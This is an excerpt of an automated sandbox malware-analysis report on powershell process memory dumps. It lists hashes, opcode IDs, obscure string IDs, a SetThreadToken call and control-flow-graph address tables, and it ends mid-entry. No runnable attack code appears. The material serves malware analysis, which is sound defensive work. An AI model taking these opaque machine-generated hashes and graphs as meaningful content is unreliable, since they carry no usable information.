                                • String ID: `^q$`^q$`^q$`^q
                                • API String ID: 0-4294711580
                                • Opcode ID: 1bb82c5aa4b80acb944289e11960ee6fc7c5ac8194967bc59de719d74728599d
                                • Instruction ID: 930e005fbc92027e19f9dceadcc5296cc43448f4d00c0d4d8d4a5e9097752533
                                • Opcode Fuzzy Hash: 1bb82c5aa4b80acb944289e11960ee6fc7c5ac8194967bc59de719d74728599d
                                • Instruction Fuzzy Hash: 00B1C374E002199FDB54DFA9D980A9DFBF6FF88304F20862AD419AB354DB34A905CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: `^q$`^q$`^q$`^q
                                • API String ID: 0-4294711580
                                • Opcode ID: 1af1d97aa911b9eeffe40135397912aeeff44de2dec59f50f546866ca24b9f61
                                • Instruction ID: 4c8908db8cc03ac255a3342e6e9bbb75b8010b1c66c21ab7d6150ced716c6277
                                • Opcode Fuzzy Hash: 1af1d97aa911b9eeffe40135397912aeeff44de2dec59f50f546866ca24b9f61
                                • Instruction Fuzzy Hash: A1B1B474E002199FDB54DFA9D980A9DFBF6FF88304F20862AD419AB354DB34A905CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: `^q$`^q$`^q$`^q
                                • API String ID: 0-4294711580
                                • Opcode ID: 34cdc7cc46a6ef9f5704a5b4e253c781884f170ed460b63b0738df811738efbf
                                • Instruction ID: 1ccdac693b554b7edfbc86d6c6a30373300df0de1b4b7942d9f75ea26cd71a8f
                                • Opcode Fuzzy Hash: 34cdc7cc46a6ef9f5704a5b4e253c781884f170ed460b63b0738df811738efbf
                                • Instruction Fuzzy Hash: 57818074E012199FDB54CFA9D990A9DFBF2FF48314F20862AD819AB314E734A905CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2204498454.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7bc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q$$]q$$]q
                                • API String ID: 0-858218434
                                • Opcode ID: e76a60d067c69d0af6d9efd06dc235d1afbf8c0554443c24612bc5e0fad57de7
                                • Instruction ID: 99c35b5d88c0171c2499c0d519b09d2786b728f9b1ee591f169e9c3f06af2b8c
                                • Opcode Fuzzy Hash: e76a60d067c69d0af6d9efd06dc235d1afbf8c0554443c24612bc5e0fad57de7
                                • Instruction Fuzzy Hash: C2213AF13102059BFB34962A49457277BDADFD0711F34C86EA945CB281DD75E450C361
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2204498454.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7bc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$$]q$$]q
                                • API String ID: 0-978391646
                                • Opcode ID: b30b3f38450842a14590680922808fa4f6d13b78af4cc39e0ba5ecf9e94ca6ae
                                • Instruction ID: 5ce109f056ee7e8fb46548f45feb5ea15b5fb004fbbf7e1af0cbb51375d79667
                                • Opcode Fuzzy Hash: b30b3f38450842a14590680922808fa4f6d13b78af4cc39e0ba5ecf9e94ca6ae
                                • Instruction Fuzzy Hash: 2101F2A170D7828FD73B222C19201696FB69FC2A10B2A85DBC481DF297C9284C0987A7

                                Execution Graph

                                Execution Coverage:5.8%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:0%
                                Total number of Nodes:3
                                Total number of Limit Nodes:0
                                execution_graph 23033 8496580 23034 84965c3 SetThreadToken 23033->23034 23035 84965f1 23034->23035

                                Control-flow Graph

                                control_flow_graph 889 2b3b490-2b3b4b9 890 2b3b4bb 889->890 891 2b3b4be-2b3b7f9 call 2b3aab4 889->891 890->891 952 2b3b7fe-2b3b805 891->952
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 75065d9abeca782f68c1533fd28bd5516556f57a2991a0b8b0e266864d86cac6
                                • Instruction ID: cdc15ba13dadb345d2f3f23b1524551bfae8af3cb187d0be05ebf225e53a2b30
                                • Opcode Fuzzy Hash: 75065d9abeca782f68c1533fd28bd5516556f57a2991a0b8b0e266864d86cac6
                                • Instruction Fuzzy Hash: F0918E71A006159BDB19EFB485106AFBBE3EFC4704B14C929D15AAB380DF34AD068FD6

                                Control-flow Graph

                                control_flow_graph 953 2b3b4a0-2b3b4b9 954 2b3b4bb 953->954 955 2b3b4be-2b3b7f9 call 2b3aab4 953->955 954->955 1016 2b3b7fe-2b3b805 955->1016
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c85d216a916500ba675974ab53acb4dd2fc2ca232407fe3332b2487d1398d62
                                • Instruction ID: 2d4c9c9fcd3892ae66b28912fb53432da586f2eb6ac4204c49668a73cd836e46
                                • Opcode Fuzzy Hash: 5c85d216a916500ba675974ab53acb4dd2fc2ca232407fe3332b2487d1398d62
                                • Instruction Fuzzy Hash: 80918D71E006199BDB19EFB485106AFB6E3EFC4704B14C92DD15AAB380DF34A9068BD6
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$pij$pij$pij$pij$pij$J'l$J'l$J'l$J'l$J'l$J'l$r&l$r&l
                                • API String ID: 0-2161624822
                                • Opcode ID: 53b0c5a4f5452b1cef9a08729e370719a1afcf7763cfdafca26318da37b0bd29
                                • Instruction ID: 5323ee462ba77357ede814ab409b443a3222d7f0b316656fd5598111ff43ce02
                                • Opcode Fuzzy Hash: 53b0c5a4f5452b1cef9a08729e370719a1afcf7763cfdafca26318da37b0bd29
                                • Instruction Fuzzy Hash: C3228DB1B042298FEB159F688C506ABBBE6FF85310F15807AD908CB251CB35DD46D7B2

                                Control-flow Graph

                                control_flow_graph 203 7323ce8-7323d0d 204 7323d13-7323d18 203->204 205 7323f00-7323f4a 203->205 206 7323d30-7323d34 204->206 207 7323d1a-7323d20 204->207 213 7323f50-7323f55 205->213 214 73240ce-73240e4 205->214 211 7323eb0-7323eba 206->211 212 7323d3a-7323d3c 206->212 209 7323d22 207->209 210 7323d24-7323d2e 207->210 209->206 210->206 215 7323ec8-7323ece 211->215 216 7323ebc-7323ec5 211->216 217 7323d3e-7323d4a 212->217 218 7323d4c 212->218 219 7323f57-7323f5d 213->219 220 7323f6d-7323f71 213->220 232 73240e6-7324112 214->232 233 732415f-7324165 214->233 221 7323ed0-7323ed2 215->221 222 7323ed4-7323ee0 215->222 224 7323d4e-7323d50 217->224 218->224 225 7323f61-7323f6b 219->225 226 7323f5f 219->226 229 7324080-732408a 220->229 230 7323f77-7323f79 220->230 228 7323ee2-7323efd 221->228 222->228 224->211 231 7323d56-7323d75 224->231 235 7324097-732409d 229->235 236 732408c-7324094 229->236 237 7323f7b-7323f87 230->237 238 7323f89 230->238 269 7323d77-7323d83 231->269 270 7323d85 231->270 242 7324228-732425d 232->242 243 7324118-732411d 232->243 239 7324167 233->239 240 7324169-7324175 233->240 245 73240a3-73240af 235->245 246 732409f-73240a1 235->246 244 7323f8b-7323f8d 237->244 238->244 249 7324177-732417e 239->249 240->249 267 732428b-7324295 242->267 268 732425f-7324281 242->268 250 7324135-7324139 243->250 251 732411f-7324125 243->251 244->229 252 7323f93-7323fb2 244->252 253 73240b1-73240cb 245->253 246->253 255 7324180-7324186 249->255 256 7324196-73241d7 249->256 261 73241da-73241e4 250->261 262 732413f-7324141 250->262 257 7324127 251->257 258 7324129-7324133 251->258 296 7323fc2 252->296 297 7323fb4-7323fc0 252->297 271 732418a-7324194 255->271 272 7324188 255->272 257->250 258->250 276 73241f1-73241f7 261->276 277 73241e6-73241ee 261->277 265 7324143-732414f 262->265 266 7324151 262->266 278 7324153-7324155 265->278 266->278 280 7324297-732429c 267->280 281 732429f-73242a5 267->281 305 7324283-7324288 268->305 306 73242d5-73242fe 268->306 279 7323d87-7323d89 269->279 270->279 271->256 272->256 282 73241f9-73241fb 276->282 283 73241fd-7324209 276->283 278->261 286 732415b-732415d 278->286 279->211 287 7323d8f-7323d96 279->287 288 73242a7-73242a9 281->288 289 73242ab-73242b7 281->289 293 732420b-7324225 282->293 283->293 286->233 286->249 287->205 294 7323d9c-7323da1 287->294 295 73242b9-73242d2 288->295 289->295 300 7323da3-7323da9 294->300 301 7323db9-7323dc8 294->301 303 7323fc4-7323fc6 296->303 297->303 307 7323dab 300->307 308 7323dad-7323db7 300->308 301->211 314 7323dce-7323dec 301->314 303->229 310 7323fcc-7324003 303->310 321 7324300-7324326 306->321 322 732432d-732435c 306->322 307->301 308->301 327 7324005-732400b 310->327 328 732401d-7324024 310->328 314->211 325 7323df2-7323e17 314->325 321->322 340 7324395-732439f 322->340 341 732435e-732437b 322->341 325->211 349 7323e1d-7323e24 325->349 332 732400f-732401b 327->332 333 732400d 327->333 330 7324026-732402c 328->330 331 732403c-732407d 328->331 335 7324030-732403a 330->335 336 732402e 330->336 332->328 333->328 335->331 336->331 345 73243a1-73243a5 340->345 346 73243a8-73243ae 340->346 354 73243e5-73243ea 341->354 355 732437d-732438f 341->355 347 73243b0-73243b2 346->347 348 73243b4-73243c0 346->348 351 73243c2-73243e2 347->351 348->351 352 7323e26-7323e41 349->352 353 7323e6a-7323e9d 349->353 361 7323e43-7323e49 352->361 362 7323e5b-7323e5f 352->362 368 7323ea4-7323ead 353->368 354->355 355->340 365 7323e4b 361->365 366 7323e4d-7323e59 361->366 367 7323e66-7323e68 362->367 365->362 366->362 367->368
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$4']q$4']q
                                • API String ID: 0-1785108022
                                • Opcode ID: b7b42bc7b00f5f8d0a25fc2565c1b1b23bb05f5f7e215e395998ce6590750d69
                                • Instruction ID: fde0ac576cc92fbaedf2b3e5b3c5bd2a8dd02dd405ccf76f58e65bd0bd88ab9e
                                • Opcode Fuzzy Hash: b7b42bc7b00f5f8d0a25fc2565c1b1b23bb05f5f7e215e395998ce6590750d69
                                • Instruction Fuzzy Hash: C012BAB2B043A59FDB158B38981076BFBA6AFC1310F14C47AD949CB291DB35CC86D7A1

                                Control-flow Graph

                                control_flow_graph 374 8496550-84965bb 375 84965c3-84965ef SetThreadToken 374->375 376 84965f8-8496615 375->376 377 84965f1-84965f7 375->377 377->376
                                APIs
                                Memory Dump Source
                                • Source File: 00000014.00000002.2275507614.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_8490000_powershell.jbxd
                                Similarity
                                • API ID: ThreadToken
                                • String ID:
                                • API String ID: 3254676861-0
                                • Opcode ID: 179736341c8882f407af0fa8c0fd75082b816fb261d0316e63f46643a2269412
                                • Instruction ID: 4b6c1211998c48a0633a7a7515f4d7cc661cd7d7f5ec8d96cda3e927f46dec00
                                • Opcode Fuzzy Hash: 179736341c8882f407af0fa8c0fd75082b816fb261d0316e63f46643a2269412
                                • Instruction Fuzzy Hash: 85218B71D042898FCB10DF99D444B9EFFF4AF89320F24405AC059A7251C2789945CFA1

                                Control-flow Graph

                                control_flow_graph 380 8496580-84965ef SetThreadToken 382 84965f8-8496615 380->382 383 84965f1-84965f7 380->383 383->382
                                APIs
                                Memory Dump Source
                                • Source File: 00000014.00000002.2275507614.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_8490000_powershell.jbxd
                                Similarity
                                • API ID: ThreadToken
                                • String ID:
                                • API String ID: 3254676861-0
                                • Opcode ID: ea881b2244588fffa966756d034f7502a5e44cea76a1080cbfaa18974d240f07
                                • Instruction ID: 1de0f9e2bce985fbcdba42eb99f8878aa262dcd25cb7521350d3906c4df86e21
                                • Opcode Fuzzy Hash: ea881b2244588fffa966756d034f7502a5e44cea76a1080cbfaa18974d240f07
                                • Instruction Fuzzy Hash: 1A1133B59002488FCB20DF9AD984B9EFFF8EF48320F24841AD419A3310C778A944CFA1

                                Control-flow Graph

                                control_flow_graph 386 2b36fe0-2b36fff 387 2b37105-2b37143 386->387 388 2b37005-2b37008 386->388 415 2b3700a call 2b37697 388->415 416 2b3700a call 2b3767c 388->416 389 2b37010-2b37022 391 2b37024 389->391 392 2b3702e-2b37043 389->392 391->392 398 2b37049-2b37059 392->398 399 2b370ce-2b370e7 392->399 401 2b37065-2b37073 call 2b3bf20 398->401 402 2b3705b 398->402 403 2b370f2 399->403 404 2b370e9 399->404 407 2b37079-2b3707d 401->407 402->401 403->387 404->403 408 2b3707f-2b3708f 407->408 409 2b370bd-2b370c8 407->409 410 2b37091-2b370a9 408->410 411 2b370ab-2b370b5 408->411 409->398 409->399 410->409 411->409 415->389 416->389
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (aq
                                • API String ID: 0-600464949
                                • Opcode ID: b2321994479ce37e367f14217d5b5464b3ddd7d9e2fc8badce1e0af467aad62f
                                • Instruction ID: 5d36326500a9f3e1fb5e59d9fbb60c1f8f2fddfbededcdca476b3d454d82d4a9
                                • Opcode Fuzzy Hash: b2321994479ce37e367f14217d5b5464b3ddd7d9e2fc8badce1e0af467aad62f
                                • Instruction Fuzzy Hash: C0415934B042058FDB15DB68C568AAEBBF2EF8D315F1440A9E406AB395CF31ED02DB60

                                Control-flow Graph

                                control_flow_graph 417 2b3afa8-2b3afb1 call 2b3a79c 419 2b3afb6-2b3afba 417->419 420 2b3afca-2b3b065 419->420 421 2b3afbc-2b3afc9 419->421 427 2b3b067-2b3b06d 420->427 428 2b3b06e-2b3b08b 420->428 427->428
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (&]q
                                • API String ID: 0-1343553580
                                • Opcode ID: fdfae38bbb8c5793ba9b4561959baea65033888ea8373e2993ce109eaaa1e86d
                                • Instruction ID: 6e7e08bb9530a175af1ec9a450b7eb1f961140b3c30591e039cac943f5c72788
                                • Opcode Fuzzy Hash: fdfae38bbb8c5793ba9b4561959baea65033888ea8373e2993ce109eaaa1e86d
                                • Instruction Fuzzy Hash: 4621DE76A042588FCB14DBAED4407AEBBF6EB89320F24846AD008E7340CA3499058BA5

                                Control-flow Graph

                                control_flow_graph 791 73217b8-73217da 792 73217e0-73217e5 791->792 793 7321969-73219b5 791->793 794 73217e7-73217ed 792->794 795 73217fd-7321801 792->795 801 7321b04-7321b1c 793->801 802 73219bb-73219c0 793->802 797 73217f1-73217fb 794->797 798 73217ef 794->798 799 7321807-732180b 795->799 800 7321914-732191e 795->800 797->795 798->795 805 732184b 799->805 806 732180d-732181e 799->806 803 7321920-7321929 800->803 804 732192c-7321932 800->804 823 7321b1e-7321b25 801->823 807 73219c2-73219c8 802->807 808 73219d8-73219dc 802->808 811 7321934-7321936 804->811 812 7321938-7321944 804->812 809 732184d-732184f 805->809 806->793 828 7321824-7321829 806->828 813 73219ca 807->813 814 73219cc-73219d6 807->814 818 73219e2-73219e4 808->818 819 7321ab4-7321abe 808->819 809->800 815 7321855-7321859 809->815 816 7321946-7321966 811->816 812->816 813->808 814->808 815->800 821 732185f-7321863 815->821 824 73219e6-73219f2 818->824 825 73219f4 818->825 826 7321ac0-7321ac9 819->826 827 7321acc-7321ad2 819->827 829 7321886 821->829 830 7321865-732186e 821->830 823->823 832 7321b27-7321b34 823->832 833 73219f6-73219f8 824->833 825->833 837 7321ad4-7321ad6 827->837 838 7321ad8-7321ae4 827->838 835 7321841-7321849 828->835 836 732182b-7321831 828->836 843 7321889-7321911 829->843 839 7321870-7321873 830->839 840 7321875-7321882 830->840 841 7321b36-7321b42 832->841 842 7321b44 832->842 833->819 844 73219fe-7321a16 833->844 835->809 845 7321833 836->845 846 7321835-732183f 836->846 847 7321ae6-7321b01 837->847 838->847 849 7321884 839->849 840->849 850 7321b46-7321b48 841->850 842->850 859 7321a30-7321a34 844->859 860 7321a18-7321a1e 844->860 845->835 846->835 849->843 855 7321b4a-7321b50 850->855 856 7321b7c-7321b86 850->856 863 7321b52-7321b54 855->863 864 7321b5e-7321b79 855->864 861 7321b90-7321b96 856->861 862 7321b88-7321b8d 856->862 873 7321a3a-7321a41 859->873 866 7321a22-7321a2e 860->866 867 7321a20 860->867 869 7321b98-7321b9a 861->869 870 7321b9c-7321ba8 861->870 863->864 866->859 867->859 874 7321baa-7321bc1 869->874 870->874 876 7321a43-7321a46 873->876 877 7321a48-7321aa5 873->877 879 7321aaa-7321ab1 876->879 877->879
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3c4109efd351da34deb7b509914fdb099946c764e1c1905746eb5665ee22f2e3
                                • Instruction ID: 1b0bee330a1df04ee5e71bde44bde1a3cee00f2f3a0d53e332aab025b07015e1
                                • Opcode Fuzzy Hash: 3c4109efd351da34deb7b509914fdb099946c764e1c1905746eb5665ee22f2e3
                                • Instruction Fuzzy Hash: ADB178B1B0426D9FDB159B6CC6407AABBE6EFC6310F24C47AD809CB251DB31D842C7A1

                                Control-flow Graph

                                control_flow_graph 1017 2b329f0-2b32a1e 1018 2b32af5-2b32b37 1017->1018 1019 2b32a24-2b32a3a 1017->1019 1023 2b32c51-2b32c61 1018->1023 1024 2b32b3d-2b32b56 1018->1024 1020 2b32a3f-2b32a52 1019->1020 1021 2b32a3c 1019->1021 1020->1018 1027 2b32a58-2b32a65 1020->1027 1021->1020 1029 2b32b5b-2b32b69 1024->1029 1030 2b32b58 1024->1030 1031 2b32a67 1027->1031 1032 2b32a6a-2b32a7c 1027->1032 1029->1023 1036 2b32b6f-2b32b79 1029->1036 1030->1029 1031->1032 1032->1018 1035 2b32a7e-2b32a88 1032->1035 1037 2b32a96-2b32aa6 1035->1037 1038 2b32a8a-2b32a8c 1035->1038 1039 2b32b87-2b32b94 1036->1039 1040 2b32b7b-2b32b7d 1036->1040 1037->1018 1041 2b32aa8-2b32ab2 1037->1041 1038->1037 1039->1023 1042 2b32b9a-2b32baa 1039->1042 1040->1039 1043 2b32ac0-2b32af4 1041->1043 1044 2b32ab4-2b32ab6 1041->1044 1045 2b32baf-2b32bbd 1042->1045 1046 2b32bac 1042->1046 1044->1043 1045->1023 1049 2b32bc3-2b32bd3 1045->1049 1046->1045 1050 2b32bd5 1049->1050 1051 2b32bd8-2b32be5 1049->1051 1050->1051 1051->1023 1054 2b32be7-2b32bf7 1051->1054 1055 2b32bf9 1054->1055 1056 2b32bfc-2b32c08 1054->1056 1055->1056 1056->1023 1058 2b32c0a-2b32c24 1056->1058 1059 2b32c26 1058->1059 1060 2b32c29 1058->1060 1059->1060 1061 2b32c2e-2b32c38 1060->1061 1062 2b32c3d-2b32c50 1061->1062
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 06da7b8f125907ed90901346d663534ba5f66a7a0638fb4f0d94be134aff8d9b
                                • Instruction ID: 16e96534700274c7c2ff464db03114a5be5bcbd5786f5030f1d2ff6c9859d388
                                • Opcode Fuzzy Hash: 06da7b8f125907ed90901346d663534ba5f66a7a0638fb4f0d94be134aff8d9b
                                • Instruction Fuzzy Hash: 21917A74A002099FCB16CF59C594AAEFBB1FF48310B248699D815AB365C735FC91CBA0
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd4a6c9cf1f2c26634cf720498ea6865b40a97bb5b48407d4e99a54bc01692f4
                                • Instruction ID: 19f24fe1d29115ded0d86c53660f26071f49d361c52a7666fcd8d875fbace134
                                • Opcode Fuzzy Hash: bd4a6c9cf1f2c26634cf720498ea6865b40a97bb5b48407d4e99a54bc01692f4
                                • Instruction Fuzzy Hash: 3A611571E002489FCB15DFA9D584B9DFBF2EF88314F14806AE819AB364DB349845CBA0
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3bdd6f1b036787fdb23c10777728988077a81df13647b93264c952d1f61e5075
                                • Instruction ID: 55917073fa9f1a25a2b74586f2b9ac3e9bac57f48a87ac19457d1eb7a9230160
                                • Opcode Fuzzy Hash: 3bdd6f1b036787fdb23c10777728988077a81df13647b93264c952d1f61e5075
                                • Instruction Fuzzy Hash: 0B61F671E00248DFDB15DFA9D584A9DBBF6EF88314F14816AE809AB364EB349845CB50
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d7c0d83c597fb21615fcf5379667d5529f1c807b13dee96c8ca9c4fd9847a398
                                • Instruction ID: de0f5c5ce3e7557edf5f1f1a1df8ac665cf07e69bd4144c6441492095a095545
                                • Opcode Fuzzy Hash: d7c0d83c597fb21615fcf5379667d5529f1c807b13dee96c8ca9c4fd9847a398
                                • Instruction Fuzzy Hash: 6851BFB53002059FDB15DB6AD944A3ABBEAFFC8315B1484A9E409CB351DF35EC02DBA0
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9f1a9665275fd7f6fd055cd15d0b094f70973a53a7e84f3d84a85a4a70e1bc7a
                                • Instruction ID: c75cd9dc671e5cbf1d437960e7a5f12540557b6774ee35f09da443e85249278f
                                • Opcode Fuzzy Hash: 9f1a9665275fd7f6fd055cd15d0b094f70973a53a7e84f3d84a85a4a70e1bc7a
                                • Instruction Fuzzy Hash: FF3119F2A00222EBEB248F29C54167AB7B7AF80740F148465DD089F655D739DC8AD7B1
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6032a08e4a220a4522124f54cd6d073d05a3e7f2d0ffc04e06df62c1c6aedf57
                                • Instruction ID: 6c9d9e9821f42f85c227eed8485ccc3b4befbc34e72da6fedff7a0be412d7405
                                • Opcode Fuzzy Hash: 6032a08e4a220a4522124f54cd6d073d05a3e7f2d0ffc04e06df62c1c6aedf57
                                • Instruction Fuzzy Hash: BF412674A005059FCB0ACF59C5D8AEAFBB1FF48314B258599D815AB364C732FC91CBA0
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a90dc088c011319963d39fd5416255a29e2eb8fcff4ab26a45c43ae360b61045
                                • Instruction ID: c5fcc711f3da21e11a23b06c994f574ff113f4cbf73239a2b32e8bc3034e9aca
                                • Opcode Fuzzy Hash: a90dc088c011319963d39fd5416255a29e2eb8fcff4ab26a45c43ae360b61045
                                • Instruction Fuzzy Hash: 62315C31300605AFD709EB78E894A9ABB9BEFC4310F048679D509CB364DF75E809CBA1
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 102951561f742cd56f782205efb40e16ed6fad3d614e11717166ca9dffc54d47
                                • Instruction ID: 37c3e0989028a1ece34baa368eb862ea60b09eece0b0ef0522bff511286a64d6
                                • Opcode Fuzzy Hash: 102951561f742cd56f782205efb40e16ed6fad3d614e11717166ca9dffc54d47
                                • Instruction Fuzzy Hash: 2F316975A002099FDB05DFB9D4957BEBBF6EF88310F24806AE445EB750EB349C418B91
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: df1dd1f8d95b262998a286e7b615d2535926dc2a0aab03fb1c3ee10948a12ce9
                                • Instruction ID: 329ccfde858ee980aa4dd67dc225cf5eb18b6b5cab9239dfa2afc903b1d8a357
                                • Opcode Fuzzy Hash: df1dd1f8d95b262998a286e7b615d2535926dc2a0aab03fb1c3ee10948a12ce9
                                • Instruction Fuzzy Hash: 5D313874A002058FCB15CF68C598AAEBBF2EF8D315F1450A8E446AB365DF31DC02DB60
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0adb9eceb3497dba247b941747798bb5dfc165e680dbfbfde22f808127806409
                                • Instruction ID: f3edddad58accd3c5fb4d36a85f6c57867c5d8a8cfb4043621f8c018172b2718
                                • Opcode Fuzzy Hash: 0adb9eceb3497dba247b941747798bb5dfc165e680dbfbfde22f808127806409
                                • Instruction Fuzzy Hash: B4318274A402049FDB05DF64D854AEE7BB6EF85300F1084A9D114AB395DE389D418FA1
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01b92ee4b7370facbc6cdaedc22507a2f62de92943139cddbad2998fcc8992ae
                                • Instruction ID: 18cf6b8b3c10f926ee306b7507ace26ddc8e48f8b5a5d4b14e94303383c2b08d
                                • Opcode Fuzzy Hash: 01b92ee4b7370facbc6cdaedc22507a2f62de92943139cddbad2998fcc8992ae
                                • Instruction Fuzzy Hash: 71313A75A002048FCB18DF68D454A9EBBF6AF88314F14856AD406EB350DF31EC85CB95
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
